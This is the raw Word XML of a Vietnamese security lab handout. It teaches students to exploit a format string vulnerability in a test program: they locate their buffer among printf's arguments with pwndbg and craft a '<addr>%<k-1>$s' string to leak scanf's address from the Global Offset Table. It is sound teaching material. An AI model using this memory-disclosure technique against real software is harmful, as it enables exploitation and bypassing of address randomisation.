    </w:p>
    <w:p w14:paraId="314BAE1C" w14:textId="0AE39E66" w:rsidR="00D04E2D" w:rsidRDefault="00B63429" w:rsidP="00B63429">
      <w:pPr>
        <w:pStyle w:val="Step"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Ví dụ sử dụng GOT (Global Offset Table), chứa thông tin ánh xạ các symbol (tên hàm, biến...) với các địa chỉ cụ thể.</w:t>
      </w:r>
      <w:r w:rsidR="00BB2343">
        <w:t xml:space="preserve"> Như ở hình bên dưới, GOT có nhiều entry (nằm ở các địa chỉ </w:t>
      </w:r>
      <w:r w:rsidR="00BB2343" w:rsidRPr="00F02150">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0x804c0xx</w:t>
      </w:r>
      <w:r w:rsidR="00BB2343">
        <w:t>), ở đó cung cấp các địa chỉ cụ thể (màu đỏ) của các hàm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594064B4" w14:textId="08746FD2" w:rsidR="00D05829" w:rsidRDefault="00D05829" w:rsidP="00B63429">
      <w:pPr>
        <w:pStyle w:val="Step"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Kết quả bên dưới là GOT sau khi đã chạy dòng lệnh gọi scanf.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CADA276" w14:textId="77EF36C4" w:rsidR="00B63429" w:rsidRPr="00B779E4" w:rsidRDefault="00D05829" w:rsidP="006F7F48">
      <w:pPr>
        <w:pStyle w:val="Step"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F14EF52" wp14:editId="4EB291CB">
            <wp:extent cx="3786608" cy="831148"/>
            <wp:effectExtent l="0" t="0" r="444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6123" cy="842016"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3018CACF" w14:textId="2D1D02A8" w:rsidR="00E01D83" w:rsidRDefault="00B779E4" w:rsidP="00BF2223">
      <w:pPr>
        <w:pStyle w:val="Step"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Xác định vị trí </w:t>
      </w:r>
      <w:r w:rsidR="00BF2223">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">của </w:t>
      </w:r>
      <w:r w:rsidR="000F3911">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">địa chỉ lưu trong </w:t>
      </w:r>
      <w:r w:rsidR="00BF2223">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>chuỗi s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> so với vùng tham số của printf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE531ED" w14:textId="77777777" w:rsidR="00A620B3" w:rsidRDefault="00310CA1" w:rsidP="000F3911">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Việc này có thể giúp xác định </w:t>
      </w:r>
      <w:r w:rsidR="00971DF9">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>chuỗi định dạng cần sử dụng</w:t>
      </w:r>
      <w:r w:rsidR="00E4589D">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">, ví dụ </w:t>
      </w:r>
      <w:r w:rsidR="000F3911">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>số lượng</w:t>
      </w:r>
      <w:r w:rsidR="00E4589D">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> %x</w:t>
      </w:r>
      <w:r w:rsidR="000F3911">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> cần có</w:t>
      </w:r>
      <w:r w:rsidR="00E4589D">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">để format %s </w:t>
      </w:r>
      <w:r w:rsidR="00941801">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>sẽ được dùng</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> tương ứng với địa chỉ cần đọc dữ liệu. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294BAB2C" w14:textId="43C5742A" w:rsidR="00200133" w:rsidRDefault="00A620B3" w:rsidP="00694B7E">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Áp dụng cách xác định vị trí tham số đối với printf của 1 vùng nhớ trong stack như ở phần </w:t>
      </w:r>
      <w:r w:rsidRPr="00695865">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>B2.1</w:t>
      </w:r>
      <w:r w:rsidR="00694B7E">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00341EA9">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">ta xem thử vị trí của chuỗi s so với vùng tham số của printf thứ 2. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50210F03" w14:textId="3EC8AF4F" w:rsidR="00784C2C" w:rsidRDefault="00784C2C" w:rsidP="00784C2C">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Mở </w:t>
      </w:r>
      <w:r w:rsidRPr="00784C2C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>app-leak</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> với gdb, khi chạy đến dòng scanf() để đọc chuỗi s từ người dùng, có thể thấy tham số thứ 2 của scanf chính là địa chỉ lưu của s, tức là </w:t>
      </w:r>
      <w:r w:rsidRPr="00784C2C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>0xffff</w:t>
      </w:r>
      <w:r w:rsidR="00EE71BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>d140</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F49D0DD" w14:textId="392AFA94" w:rsidR="00784C2C" w:rsidRDefault="00EE71BF" w:rsidP="006F7F48">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40DBD0B1" wp14:editId="107CA87C">
            <wp:extent cx="4351884" cy="20596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877" cy="2074760"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDE81E7" w14:textId="10366DD2" w:rsidR="00784C2C" w:rsidRDefault="00784C2C" w:rsidP="00784C2C">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Tiếp đến, xem vị trí đặt các tham số của hàm printf thứ 2. Ta thấy tham số đầu tiên</w:t>
      </w:r>
      <w:r w:rsidR="006619F8">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> được </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">đặt ở địa chỉ </w:t>
      </w:r>
      <w:r w:rsidRPr="00244888">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>0xffff</w:t>
      </w:r>
      <w:r w:rsidR="006777B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>d13</w:t>
      </w:r>
      <w:r w:rsidRPr="00244888">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2A7009" w14:textId="2C2DE21C" w:rsidR="00784C2C" w:rsidRDefault="006777B2" w:rsidP="00784C2C">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77480B8F" wp14:editId="21F0606A">
            <wp:extent cx="4422605" cy="219739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3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4443181" cy="2207618"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5318B926" w14:textId="4045593B" w:rsidR="00784C2C" w:rsidRDefault="00784C2C" w:rsidP="00784C2C">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Ta có thể xem các giá trị đang được lưu gần địa chỉ </w:t>
      </w:r>
      <w:r w:rsidRPr="00244888">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>0xffff</w:t>
      </w:r>
      <w:r w:rsidR="0053171F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>d13</w:t>
      </w:r>
      <w:r w:rsidRPr="00244888">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7683C343" w14:textId="2A3834D1" w:rsidR="00784C2C" w:rsidRPr="00D411F4" w:rsidRDefault="000D5BA9" w:rsidP="00784C2C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
        <w:spacing w:before="80" w:after="80" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pwndbg</w:t>
      </w:r>
      <w:r w:rsidR="00784C2C" w:rsidRPr="00747EB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidR="00784C2C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00784C2C">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>x/</w:t>
      </w:r>
      <w:r w:rsidR="006619F8">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00784C2C">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">0wx </w:t>
      </w:r>
      <w:r w:rsidR="00784C2C" w:rsidRPr="00D411F4">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>0xffff</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>d13</w:t>
      </w:r>
      <w:r w:rsidR="00784C2C" w:rsidRPr="00D411F4">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CC27D6" w14:textId="3C9E33FC" w:rsidR="00784C2C" w:rsidRDefault="009433FA" w:rsidP="00784C2C">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C3D31A7" wp14:editId="719A9874">
            <wp:extent cx="4420486" cy="805789"/>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4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4458960" cy="812802"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC8563B" w14:textId="01CADBAA" w:rsidR="006F7F48" w:rsidRPr="00341EA9" w:rsidRDefault="00341EA9" w:rsidP="008C4216">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F305BD">
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Giả sử đặt địa chỉ cần đọc dữ liệu ở đầu chuỗi s</w:t>
      </w:r>
      <w:r w:rsidR="003272A5" w:rsidRPr="00F305BD">
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> (khung màu xanh)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F305BD">
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, xác định địa chỉ cần đọc dữ liệu lưu trong chuỗi s sẽ nằm ở tham số thứ mấy của printf?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72162592" w14:textId="2D29EFAA" w:rsidR="00A75CAC" w:rsidRDefault="00A75CAC" w:rsidP="00A75CAC">
      <w:pPr>
        <w:pStyle w:val="Step"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Tạo chuỗi định dạng để đọc dữ liệu từ địa chỉ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77795F8D" w14:textId="182A33B5" w:rsidR="00A75CAC" w:rsidRDefault="00A75CAC" w:rsidP="00A75CAC">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Sau bước 2, ta đã xác định được địa chỉ cần đọc dữ liệu trong chuỗi s sẽ nằm ở vị trí tham số nào của printf, giả sử là </w:t>
      </w:r>
      <w:r w:rsidR="008E7E18" w:rsidRPr="005455AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">. Ở bước này cần tạo 1 chuỗi định dạng, trong đó tại vị trí tham số thứ </w:t>
      </w:r>
      <w:r w:rsidR="00B21D1A" w:rsidRPr="005455AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005455AC">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">của printf </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">sẽ có format %s để đọc dữ liệu. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A363E6" w14:textId="1455C1EA" w:rsidR="00D05044" w:rsidRDefault="00F25533" w:rsidP="00F3661B">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r>
        <w:t>Với</w:t>
      </w:r>
      <w:r w:rsidR="00A75CAC">
        <w:t xml:space="preserve"> địa chỉ cần đọc dữ liệu là tham số thứ </w:t>
      </w:r>
      <w:r w:rsidR="00E77F78" w:rsidRPr="004032CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="00A75CAC">
        <w:t xml:space="preserve"> của printf,</w:t>
      </w:r>
      <w:r w:rsidR="00D05044" w:rsidRPr="00F3661B">
        <w:t xml:space="preserve"> có thể </w:t>
      </w:r>
      <w:r w:rsidR="00A75CAC">
        <w:t xml:space="preserve">trực tiếp đọc </w:t>
      </w:r>
      <w:r w:rsidR="00D05044" w:rsidRPr="00F3661B">
        <w:t xml:space="preserve">nội dung </w:t>
      </w:r>
      <w:r w:rsidR="00A75CAC">
        <w:t>tại địa chỉ đó</w:t>
      </w:r>
      <w:r w:rsidR="00E12F09">
        <w:t xml:space="preserve"> với chuỗi định dạng sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EF5C53" w14:textId="59373C4C" w:rsidR="00A75CAC" w:rsidRPr="00A75CAC" w:rsidRDefault="00A75CAC" w:rsidP="00A75CAC">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A75CAC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&lt;addr&gt;%</w:t>
      </w:r>
      <w:r w:rsidR="006B254C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidR="00F468DC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="006B254C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
        </w:rPr>
        <w:t>-1&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00A75CAC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
        </w:rPr>
        <w:t>$s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067EC92E" w14:textId="6EBD3E3D" w:rsidR="00C87497" w:rsidRPr="00C87497" w:rsidRDefault="00C87497" w:rsidP="00D341F8">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Lưu ý: nếu địa chỉ addr không hợp lệ hoặc số </w:t>
      </w:r>
      <w:r w:rsidR="005A4C8D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>k-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> chưa phù hợp, việc truy xuất địa chỉ sẽ gây ra lỗi, tương tự như phần B.2.2.</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9B0144" w14:paraId="222D62D6" w14:textId="77777777" w:rsidTr="0072589C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9495" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="36" w:space="0" w:color="0070C0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent1" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="4819D5D7" w14:textId="7A08CF97" w:rsidR="009B0144" w:rsidRPr="00B46B41" w:rsidRDefault="009B0144" w:rsidP="0079501C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1418"/>
              </w:tabs>
              <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
              <w:ind w:left="128" w:firstLine="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">Sinh viên khai thác và truyền chuỗi s </w:t>
            </w:r>
            <w:r w:rsidR="00832BC6">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">đọc thông tin từ Global Offset Table (GOT) và lấy về địa chỉ của hàm </w:t>
            </w:r>
            <w:r w:rsidR="00832BC6">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>scanf</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>. Giải thích ý nghĩa của chuỗi định dạng và lý do có thể in được giá trị cần thiết.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3CFFDEDF" w14:textId="005F4FA6" w:rsidR="00B87179" w:rsidRPr="00B46B41" w:rsidRDefault="00B46B41" w:rsidP="00B46B41">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r>
        <w:t>Gợi ý đoạn mã khai thác:</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458"/>
        <w:gridCol w:w="9072"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D04F54" w14:paraId="0844AE4A" w14:textId="77777777" w:rsidTr="00D04F54">
        <w:tc>
          <w:tcPr>
